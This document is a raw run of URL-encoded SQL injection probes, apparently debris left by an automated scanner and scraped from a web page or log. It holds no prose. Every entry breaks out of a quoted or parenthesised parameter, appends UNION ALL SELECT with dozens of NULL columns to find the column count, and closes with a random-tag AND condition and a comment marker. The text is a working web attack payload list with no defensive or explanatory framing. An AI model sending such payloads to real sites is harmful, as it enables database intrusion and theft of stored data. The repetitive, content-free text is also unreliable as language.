1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22laHy%22%3D%22laHy 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22SiPG%22%3D%22SiPG 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22yAVD%22%3D%22yAVD 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tYdu%22%20LIKE%20%22tYdu 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22RHMX%22%20LIKE%20%22RHMX 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22grEt%22%20LIKE%20%22grEt 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22KBZN%22%20LIKE%20%22KBZN 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22uayY%22%20LIKE%20%22uayY 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22cpfK%22%20LIKE%20%22cpfK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22IhNR%22%20LIKE%20%22IhNR 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22CJad%22%20LIKE%20%22CJad 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22srTa%22%20LIKE%20%22srTa 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22eZNO%22%20LIKE%20%22eZNO 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22DrGv%22%20LIKE%20%22DrGv 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22qNyG%22%20LIKE%20%22qNyG 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Zkxh%22%20LIKE%20%22Zkxh 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22SKOy%22%20LIKE%20%22SKOy 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22WOms%22%20LIKE%20%22WOms 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Hwoa%22%20LIKE%20%22Hwoa 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22QRZc%22%20LIKE%20%22QRZc 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22zqBn%22%20LIKE%20%22zqBn 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22vIOG%22%20LIKE%20%22vIOG 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22hfgf%22%20LIKE%20%22hfgf 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22DjkQ%22%20LIKE%20%22DjkQ 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ipwR%22%20LIKE%20%22ipwR 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22kQPR%22%20LIKE%20%22kQPR 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22sehU%22%20LIKE%20%22sehU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ekVB%22%20LIKE%20%22ekVB 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22RRGj%22%20LIKE%20%22RRGj 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22EZFU%22%20LIKE%20%22EZFU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22lWAq%22%20LIKE%20%22lWAq 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22buXB%22%20LIKE%20%22buXB 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22edIn%22%20LIKE%20%22edIn 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22nNhW%22%20LIKE%20%22nNhW 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22vFUC%22%20LIKE%20%22vFUC 